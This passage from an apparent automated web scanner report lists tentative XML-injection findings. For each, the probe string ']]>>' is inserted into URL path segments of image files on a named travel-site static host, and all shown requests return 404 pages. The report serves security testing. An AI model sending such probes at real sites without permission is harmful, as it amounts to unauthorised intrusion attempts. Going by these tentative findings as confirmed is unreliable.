Path:   /static/images/hotel/details/imgReviewsBox_Bottom.gif

Issue detail

The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static/images]]>>/hotel/details/imgReviewsBox_Bottom.gif?ver=218159 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1422
Vary: Accept-Encoding
Cache-Control: private, max-age=31535976
Date: Mon, 03 Oct 2011 01:02:25 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...

8.164. http://ak-static.hotwirestatic.com/static/images/hotel/details/imgReviewsBox_Bottom.gif [REST URL parameter 3]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/images/hotel/details/imgReviewsBox_Bottom.gif

Issue detail

The REST URL parameter 3 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 3. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static/images/hotel]]>>/details/imgReviewsBox_Bottom.gif?ver=218159 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1422
Vary: Accept-Encoding
Cache-Control: private, max-age=31535964
Date: Mon, 03 Oct 2011 01:02:30 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...

8.165. http://ak-static.hotwirestatic.com/static/images/hotel/details/imgReviewsBox_Bottom.gif [REST URL parameter 4]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/images/hotel/details/imgReviewsBox_Bottom.gif

Issue detail

The REST URL parameter 4 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 4. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static/images/hotel/details]]>>/imgReviewsBox_Bottom.gif?ver=218159 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1422
Vary: Accept-Encoding
Cache-Control: private, max-age=31535949
Date: Mon, 03 Oct 2011 01:02:33 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...

8.166. http://ak-static.hotwirestatic.com/static/images/hotel/details/imgReviewsBox_Bottom.gif [REST URL parameter 5]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/images/hotel/details/imgReviewsBox_Bottom.gif

Issue detail

The REST URL parameter 5 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 5. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static/images/hotel/details/imgReviewsBox_Bottom.gif]]>>?ver=218159 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Expires: Mon, 03 Oct 2011 01:02:36 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 03 Oct 2011 01:02:36 GMT
Content-Length: 1422
Connection: close
Vary: Accept-Encoding

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...

8.167. http://ak-static.hotwirestatic.com/static/images/hotel/details/imgReviewsBox_Top.gif [REST URL parameter 1]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/images/hotel/details/imgReviewsBox_Top.gif

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static]]>>/images/hotel/details/imgReviewsBox_Top.gif?ver=218159 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1422
Vary: Accept-Encoding
Cache-Control: private, max-age=31535963
Date: Mon, 03 Oct 2011 01:02:21 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...

8.168. http://ak-static.hotwirestatic.com/static/images/hotel/details/imgReviewsBox_Top.gif [REST URL parameter 2]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/images/hotel/details/imgReviewsBox_Top.gif

Issue detail

The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static/images]]>>/hotel/details/imgReviewsBox_Top.gif?ver=218159 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1422
Vary: Accept-Encoding
Cache-Control: private, max-age=31535984
Date: Mon, 03 Oct 2011 01:02:24 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...

8.169. http://ak-static.hotwirestatic.com/static/images/hotel/details/imgReviewsBox_Top.gif [REST URL parameter 3]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/images/hotel/details/imgReviewsBox_Top.gif

Issue detail

The REST URL parameter 3 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 3. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static/images/hotel]]>>/details/imgReviewsBox_Top.gif?ver=218159 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1422
Vary: Accept-Encoding
Cache-Control: private, max-age=31536000
Date: Mon, 03 Oct 2011 01:02:28 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...

8.170. http://ak-static.hotwirestatic.com/static/images/hotel/details/imgReviewsBox_Top.gif [REST URL parameter 4]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/images/hotel/details/imgReviewsBox_Top.gif

Issue detail

The REST URL parameter 4 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 4. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static/images/hotel/details]]>>/imgReviewsBox_Top.gif?ver=218159 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1422
Vary: Accept-Encoding
Cache-Control: private, max-age=31535980
Date: Mon, 03 Oct 2011 01:02:32 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...

8.171. http://ak-static.hotwirestatic.com/static/images/hotel/details/imgReviewsBox_Top.gif [REST URL parameter 5]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/images/hotel/details/imgReviewsBox_Top.gif

Issue detail

The REST URL parameter 5 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 5. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static/images/hotel/details/imgReviewsBox_Top.gif]]>>?ver=218159 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Expires: Mon, 03 Oct 2011 01:02:34 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 03 Oct 2011 01:02:34 GMT
Content-Length: 1422
Connection: close
Vary: Accept-Encoding

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...

8.172. http://ak-static.hotwirestatic.com/static/images/hotel/details/tripAdvisorLogo.gif [REST URL parameter 1]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/images/hotel/details/tripAdvisorLogo.gif

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static]]>>/images/hotel/details/tripAdvisorLogo.gif?ver=218159 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1422
Vary: Accept-Encoding
Cache-Control: private, max-age=31535999
Date: Mon, 03 Oct 2011 01:02:23 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...

8.173. http://ak-static.hotwirestatic.com/static/images/hotel/details/tripAdvisorLogo.gif [REST URL parameter 2]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/images/hotel/details/tripAdvisorLogo.gif

Issue detail

The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static/images]]>>/hotel/details/tripAdvisorLogo.gif?ver=218159 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1422
Vary: Accept-Encoding
Cache-Control: private, max-age=31535993
Date: Mon, 03 Oct 2011 01:02:25 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...

8.174. http://ak-static.hotwirestatic.com/static/images/hotel/details/tripAdvisorLogo.gif [REST URL parameter 3]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/images/hotel/details/tripAdvisorLogo.gif

Issue detail

The REST URL parameter 3 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 3. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static/images/hotel]]>>/details/tripAdvisorLogo.gif?ver=218159 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1422
Vary: Accept-Encoding
Cache-Control: private, max-age=31536000
Date: Mon, 03 Oct 2011 01:02:30 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...

8.175. http://ak-static.hotwirestatic.com/static/images/hotel/details/tripAdvisorLogo.gif [REST URL parameter 4]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/images/hotel/details/tripAdvisorLogo.gif

Issue detail

The REST URL parameter 4 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 4. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static/images/hotel/details]]>>/tripAdvisorLogo.gif?ver=218159 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1422
Vary: Accept-Encoding
Cache-Control: private, max-age=31536000
Date: Mon, 03 Oct 2011 01:02:32 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...

8.176. http://ak-static.hotwirestatic.com/static/images/hotel/details/tripAdvisorLogo.gif [REST URL parameter 5]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/images/hotel/details/tripAdvisorLogo.gif

Issue detail

The REST URL parameter 5 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 5. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static/images/hotel/details/tripAdvisorLogo.gif]]>>?ver=218159 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Expires: Mon, 03 Oct 2011 01:02:35 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 03 Oct 2011 01:02:35 GMT
Content-Length: 1422
Connection: close
Vary: Accept-Encoding

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...

8.177. http://ak-static.hotwirestatic.com/static/images/hotel/details/tripadvisor-ratings/tripAdvisorRating.png [REST URL parameter 1]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/images/hotel/details/tripadvisor-ratings/tripAdvisorRating.png

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static]]>>/images/hotel/details/tripadvisor-ratings/tripAdvisorRating.png?ver=222337 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1422
Vary: Accept-Encoding
Cache-Control: private, max-age=31535998
Date: Mon, 03 Oct 2011 01:02:11 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...

8.178. http://ak-static.hotwirestatic.com/static/images/hotel/details/tripadvisor-ratings/tripAdvisorRating.png [REST URL parameter 2]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/images/hotel/details/tripadvisor-ratings/tripAdvisorRating.png

Issue detail

The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static/images]]>>/hotel/details/tripadvisor-ratings/tripAdvisorRating.png?ver=222337 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1422
Vary: Accept-Encoding
Cache-Control: private, max-age=31536000
Date: Mon, 03 Oct 2011 01:02:16 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...

8.179. http://ak-static.hotwirestatic.com/static/images/hotel/details/tripadvisor-ratings/tripAdvisorRating.png [REST URL parameter 3]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/images/hotel/details/tripadvisor-ratings/tripAdvisorRating.png

Issue detail

The REST URL parameter 3 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 3. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static/images/hotel]]>>/details/tripadvisor-ratings/tripAdvisorRating.png?ver=222337 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1422
Vary: Accept-Encoding
Cache-Control: private, max-age=31536000
Date: Mon, 03 Oct 2011 01:02:19 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...

8.180. http://ak-static.hotwirestatic.com/static/images/hotel/details/tripadvisor-ratings/tripAdvisorRating.png [REST URL parameter 4]

Summary

